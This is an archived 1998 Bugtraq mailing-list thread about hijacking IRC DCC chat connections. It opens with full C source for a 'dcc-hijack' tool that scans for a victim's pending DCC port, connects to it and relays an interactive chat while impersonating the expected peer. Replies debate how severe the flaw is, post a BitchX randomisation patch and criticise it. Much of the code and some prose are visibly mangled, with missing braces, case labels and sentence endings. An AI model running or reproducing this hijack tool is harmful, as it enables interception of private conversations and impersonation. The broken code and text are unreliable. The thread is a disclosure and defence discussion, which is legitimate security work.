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Date: Sat, 19 Dec 1998 13:58:04 +0100
From: awgn@COSMOS.IT
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Irc: another funny stuff. In some irc clients dcc may be hijacked.
I just found a funny bug playing with some irc-client. DCC-chat may be
The trouble comes while clients bind port to accept or request a dcc
Being this a simple TCP connection without any ip control.. the way to
exploit is trivial.
Here we go:
B , the hi-jacker wants to have fun with A. So he first creates a dcc
connection with A,
getting the port binded.
Now A is under attack since next ports used to create connections will
be quite consecutive to the first one. BitchX and IRCepic seem to be
affected with this matter. ( other clients???)
Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a
bot? )
B , using the following source, is going to assume the identity of C
except for his host. :-)
I simply implemented some routines of my hailscan to guess which is the
port binded.
When it finds an open port, it establish a connection running a kinda
All of this is just for educational purpose only.
The source provided herein can be improved for better results.
coding&networking division.
[ Part 2: "Attached Text" ]
/* Dcc hijack (c) 1998 awgn@cosmos.it
* Some pieces of this code are ripped from hailscan v 1.9908.
* available at www.dislessici.org. ( hosted at cosmos.it )
* CREDITS: cosmos.it -> this isp r0x!!!! ( Thansk to spider@cosmos.it )
* kasko, antirez & gigi_sull @seclab.com
* GREETINGS: *@dislessici.org , #hackers@ircity rappo,filo,cyber,litos,lordfelix...
* Sir-Alex: take it easy... only God knows the truth ;-).
* Thor: everyone is missing you.
* Jwk, jam, zorro , c1rp0, megat0n -> how is going your parser ? ;)
* #hackers@undernet.org ( expecially to my buddy nigr zerox)
* #america@undernet.org ( dedicated to my bro' sartre, exx & jeanlucP )
* #hackers.it@ircnet ( m0f0z - radon - Nail^d0d )
* NERVOUS! -> how can i forget your nick? hehe
* Tested on Linux and *BSD.
* This code is provided for educational purposes only. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#define MAXSOCKET 32
#define TIMEOUT 10
struct sockaddr_in newsock;
struct sweep {
int sock;
short port;
long sec;
long usec;
struct sweep *next;
struct sweep *sheet, *top_sheet;
int csock = 0;
int portcounter;
set_nonblock (int s)
int val = 0;
if ((val = fcntl (s, F_GETFL, val)) == -1)
return -1;
val |= O_NONBLOCK;
fcntl (s, F_SETFL, val);
return 0;
time_out (long int sec_a, long int usec_a, long int sec_b, long int usec_b, int time_max)
if ((((sec_a - sec_b) == time_max) && (usec_a > usec_b)) || ((sec_a - sec_b) > time_max))
return 1;
return 0;
push_sockets (void)
struct timeval actually;
gettimeofday (&actually, NULL);
if (!sheet->sock) {
sheet->sock = socket (AF_INET, SOCK_STREAM, 0);
if (set_nonblock (sheet->sock) == -1)
return 0;
sheet->sec = actually.tv_sec;
sheet->usec = actually.tv_usec;
sheet->port = portcounter++;
} else
return 0;
return 1;
getnbobyname (u_char * host)
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr (host)) == -1) {
if (!(host_ent = gethostbyname (host))) {
fprintf (stderr, "gethostbyname() or inet_addr() err:%s\n", strerror (errno));
return 0;
bcopy (host_ent->h_addr, (char *) &addr.s_addr, host_ent->h_length);
return addr.s_addr;
client (int s, char *str)
FILE *in, *out;
char in_line[1024];
char out_line[1024];
in = fdopen (s, "r");
out = fdopen (s, "a");
setlinebuf (in);
setlinebuf (out);
set_nonblock (s);
printf ("\nGotcha!\nDCC hijacked.\n\n\n");
while (1) {
while (fgets (in_line, 1024, in))
printf ("<%s> %s", str, in_line);
fgets (out_line, 1024, stdin);
if (strlen (out_line) > 1)
fprintf (out, "%s", out_line);
exit (0);
usage (char *name)
fprintf (stderr, "\ndcc-hijack (c) 1998 awgn@cosmos.it\n\n");
fprintf (stderr, "usage: %s host.of.dcc.asker baseport\n", name);
exit (1);
scan (unsigned long int a, int *out, unsigned short int *port)
struct timeval now;
int i = 0;
*out = 0;
*port = 0;
sheet = (struct sweep *) malloc (sizeof (struct sweep));
top_sheet = sheet;
for (; i < MAXSOCKET; i++) {
sheet->sock = 0;
sheet->next = (struct sweep *) malloc (sizeof (struct sweep));
sheet = sheet->next;
sheet->next = NULL;
sheet = top_sheet;
newsock.sin_addr.s_addr = a;
newsock.sin_family = AF_INET;
while (1) {
while (sheet->next) {
gettimeofday (&now, NULL);
if (!sheet->sock)
push_sockets ();
else {
if (time_out (now.tv_sec, now.tv_usec, sheet->sec, sheet->usec, TIMEOUT))
sheet->sock = 0;
else {
newsock.sin_port = htons ((u_short) sheet->port);
if (connect (sheet->sock, (struct sockaddr *) &newsock, sizeof (newsock)) == 0) {
*out = sheet->sock;
*port = sheet->port;
} else
switch (errno) {
*out = sheet->sock;
*port = sheet->port;
case EINVAL:
sheet = sheet->next;
sheet = top_sheet;
main (int argc, char **argv)
int nb0 = 0;
int sock = 0;
unsigned short port_guessed = 0;
if (argc < 3)
usage (argv[0]);
if (!(nb0 = (u_long) getnbobyname ((char *) argv[1]))) {
fprintf (stderr, "argv[1] err: which kind of host/ip did you pass me?\n");
exit (1);
if (!(portcounter = atoi (argv[2]))) {
fprintf (stderr, "port() err: which kind of port did you pass me?\n");
exit (1);
scan (nb0, &sock, &port_guessed);
if (!sock || !port_guessed) {
fprintf (stderr, "Sorry: no port found.\nDCC between clients may be already estabilished.\n");
exit (1);
client (sock, argv[1]);
return 0;
Date: Sun, 20 Dec 1998 10:35:43 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may be hijacked. (fwd)
---------- Forwarded message ----------
Received: from BlackHole.RainNet.Org (rain@BlackHole.RainNet.Org [])
by Portal.RainNet.Org (8.8.8/8.8.8/Debian/GNU) with ESMTP id KAA26632
for <rain@portal.RainNet.Org>; Sun, 20 Dec 1998 10:31:10 -0500
Received: from listopher.concentric.net (listopher.concentric.net
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id KAA21767; Sun, 20 Dec 1998 10:06:15 -0500 (EST)
Message-ID: <199812201506.JAA27379@nemesis.acronet.net>
To: ircii-epic@concentric.net
Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may
be hijacked.
In-Reply-To: Your message of "19 Dec 1998 22:17:00 +0200."
Date: Sun, 20 Dec 1998 09:06:07 -0600
>From: Jeremy Nelson <jnelson@acronet.net>
Sender: owner-ircii-epic@concentric.net
Precedence: bulk
>I just found a funny bug playing with some irc-client. DCC-chat may be
This is not a bug in the client. It is a function of the operating system.
For example, this ``bug'' is not present in OpenBSD because it hands out
ports randomly
>The trouble comes while clients bind port to accept or request a dcc
>CHAT/SEND/ or RECEIVE. Being this a simple TCP connection without any ip
>control.. the way to exploit is trivial.
This is preposterous. The client informs you of the remote IP address
connecting. Any half-aware user checks the IP address to make sure
that it is reasonable.
>Here we go:
>B , the hi-jacker wants to have fun with A. So he first creates
>a dcc connection with A, getting the port binded.
>Now A is under attack since next ports used to create connections will
>be quite consecutive to the first one. BitchX and IRCepic seem to be
>affected with this matter. ( other clients???)
>Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a
>bot? ) B , using the following source, is going to assume the identity of C
>except for his host. :-)
Folks, this is completely preposterous. This "exploit program" is nothing
more than a limited-range port scanner. What this "exploit" boils down
to is:
"If you establish a DCC connection with me, then if I port-scan
you later between when you offer a DCC and when it is received,
I will be able to connect to your DCC offer."
Well, duh. You could just turn this into a full-blown scanner and scan all
day for DCC connections if thats what you wanted to accomplish, and even
such a scanner as that would work on OpenBSD, where ports are handed out
Folks, this is not a bug, except to the extent that you completely ignore
the IP address on your established DCC transactions. If its not the right
IP, close it and try again. And email the abuse contact of the offending
ISP about how their users are port scanning you.
Date: Sun, 18 Oct 1998 19:50:48 +0200
From: Alessio Orlandi <nailtbt@TIN.IT>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: DCC HiJacking patch for BitchX 75p1
1 Shown 26 lines Text
2 Shown 20 lines Text
Hi all,
as recently discovered, with a simple port scan you can hijack some
of the BitchX dcc
connections. This due to the port assigning on the requesting client.
Here follows a really short patch that will fix the problem. The problem
is here:
BitchX when creates a DCC connection (listening socket) uses the
connect_by_number (defined in network.c file). Passing as port 0
This means that the OS will determine the port. Now.. for mental order..
the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
random value to the port returned by the system. All is now fixed.
Patch follows
"NaiL^d0d@ircnet/ircity" Orlandi
Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
awgn (hehe),
Lordfelix (salam), Raptor,
BlackJam, kasko, antirez
and hackers.it@ircnet Soren, NaiF, Bonjo
[ Part 2: "Attached Text" ]
--- source/network.c
+++ source/network.c 1998/7/20 08:56:44
@@ -21,7 +21,9 @@
#include <sys/filio.h>
+/* NaiL^d0d: no hijack please, we need random bytes, in stdlib.h */
+#include <stdlib.h>
extern char hostname[NAME_LEN+1];
extern int use_socks;
@@ -172,6 +172,7 @@
memset(&name, 0, sizeof(struct sockaddr_in));
name.sin_family = AF_INET;
name.sin_addr.s_addr = htonl(INADDR_ANY);
name.sin_port = htons(*portnum);
+name.sin_port+=(unsigned short)(rand() &255);
if (bind(fd, (struct sockaddr *)&name, sizeof(name)))
Date: Mon, 21 Dec 1998 16:33:30 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
# Hi all,
# as recently discovered, with a simple port scan you can hijack some
# of the BitchX dcc
# connections. This due to the port assigning on the requesting client.
# Here follows a really short patch that will fix the problem. The problem
# is here:
# BitchX when creates a DCC connection (listening socket) uses the
# functions
# connect_by_number (defined in network.c file). Passing as port 0
# This means that the OS will determine the port. Now.. for mental order..
# the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
# random value to the port returned by the system. All is now fixed.
# Patch follows
# -----------------------------------------------------------------------------------------
# Regards
# Alessio
# "NaiL^d0d@ircnet/ircity" Orlandi
# Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
# awgn (hehe),
# Lordfelix (salam), Raptor,
# BlackJam, kasko, antirez
# and hackers.it@ircnet Soren, NaiF, Bonjo
# ----------------------------------------------------------------------------------------
This patch won't work-- what if a port you decide on is already in use by
something else?
Date: Mon, 21 Dec 1998 16:27:13 -0500
From: Andy Dills <andy@SS5.XECU.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
> the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
> random value to the port returned by the system. All is now fixed.
> Patch follows
Your patch changes the order, but there is still order.
You need to call srand() once before using rand, to ensure actual
System Administrator
XecuNet Internet Services
Date: Tue, 22 Dec 1998 18:48:43 -0600
From: mikey <mikey@PHEDZ.COM>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
Yes, this might help. But why worry? they would need to port scan, and
find the port quicker than the other client can connect. Do you think they
can do this all the time? Or Barely ever? So this is not a problem, I
don't understand why anyone even got jumpy over it. I could do the same
with ftp, ftp opens ports waiting to recieve files. Do you see people
making patches for that?
On Sun, 18 Oct 1998, Alessio Orlandi wrote:
> Hi all,
> as recently discovered, with a simple port scan you can hijack some
> of the BitchX dcc
> connections. This due to the port assigning on the requesting client.
> Here follows a really short patch that will fix the problem. The problem
> is here:
> BitchX when creates a DCC connection (listening socket) uses the
> functions
> connect_by_number (defined in network.c file). Passing as port 0
> This means that the OS will determine the port. Now.. for mental order..
> the ports will be quiet consecutive. Bad.. Bad... So.. let's add a
> random value to the port returned by the system. All is now fixed.
> Patch follows
> -----------------------------------------------------------------------------------------
> Regards
> Alessio
> "NaiL^d0d@ircnet/ircity" Orlandi
> Thanks to: hackers@ircity Litos (you one of my best friend), Nervous,
> awgn (hehe),
> Lordfelix (salam), Raptor,
> BlackJam, kasko, antirez
> and hackers.it@ircnet Soren, NaiF, Bonjo
> ----------------------------------------------------------------------------------------
Date: Tue, 22 Dec 1998 15:41:26 -0500
From: Ben Winslow <rain@INSANE.LOONYBIN.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: Ircii-epic: about dcc hijacking... (fwd)
To: ircii-epic@concentric.net
Subject: Re: Ircii-epic: about dcc hijacking... (fwd)
In-Reply-To: Your message of "Mon, 21 Dec 1998 16:30:59 EST."
Date: Tue, 22 Dec 1998 10:31:31 -0600
>From: Jeremy Nelson <jnelson@acronet.net>
Sender: owner-ircii-epic@concentric.net
Precedence: bulk
>Heya, I did not say that dcc-hijack.c is more than a simple tcp
>portscanner, so this is not so preposterous as you wrote.
What I thought was preposterous is that you presented this as some kind of
serious problem.
>Then if you read my post with attention you can't find anything absurde.
No comment.
>More, it could not be a `bug', anyway we can easly patch irc-client to
>bind random port.
This won't change the problem since you can still port-scan a wider range
to pick up the random ports. This kind of stuff is best left to the
operating system.
Your "exploit" only works when:
1) Someone either accepts or initiates a dcc transaction with an
untrusted party.
2) During the time that the untrusted party runs the port scanner, the
DCC transaction is the one and only transaction that is pending. If,
for example, someone is doing a FTP, then you could just as well pick up
one of their PORT commands rather than a DCC listen.
3) The untrusted party runs the port scanner between when the person
initiates the latter DCC CHAT and when the latter DCC CHAT is accepted.
(Race condition)
4) The person does not double-check the IP address on the latter DCC CHAT
to see if it is reasonable.
>Which is your point of view? hehe
My point of view is that one should write a script to hook /on dcc_offer,
dispatch a userhost or userip (depending on your network) to retrieve the
hostname of the person you are soliciting for a dcc transaction. When that
hostname information comes back, stash it in a variable. When the DCC is
accepted, if the hostname information has not come back, 'wait'. If it
has come back, then check $2 (or whatever) against the IP address of the
person you are interested in. If its not the same, chances are you have
a conflict to look at.
An alternative solution for those who are lazy is to keep a "moving" variable
that holds open a DCC RAW port over the last few DCC's you have offered.
Something that hooks /on dcc_offer and then does a $listen() to fool the
port scanner into connecting to the $listen() socket would be sufficient.
One must be careful to close their fd's though when theyre done.
I do not feel that the random binding of ports offers anything useful
above and beyond the current mechanism. If you are interested in
implementing either of the above, then i would be most appreciative and
interested in your work...
Date: Tue, 22 Dec 1998 13:48:06 -0500
From: YounGoat <youngoat@ALFHEIM.NET>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: DCC HiJacking patch for BitchX 75p1
I can see this being exploited. I'll give you an example. You have A who is
trying to hijack B's DCC to C who is a bot.
A dcc chat's B. (he gets the port that that B uses. And gives that to
his hijack program which will then go thorough the next 150 ports or so over and
A asks B if he is able to DCC chat the bot C. And asks B to try.
When B tries to dcc the bot, guess who is right there ready to connect to B and
give him a "Enter your password." prompt?
This is not meant to be a guide for script kiddies, but I do believe this is
certainly a problem, and the only sure fix is to check the hostname of the
person connecting or use a password that is given during the DCC request for
authentication. Since the latter would involve changing the IRC protocol, I'd
say irc clients are just going to have to verify that the right person is
connecting. With that, the worst thing that could happen is that somebody
could keep connecting and the irc client would keep rejecting him, possibly
causing a DOS.
E-Mail: YounGoat <youngoat@alfheim.net>
Date: 22-Dec-98
Time: 13:39:09
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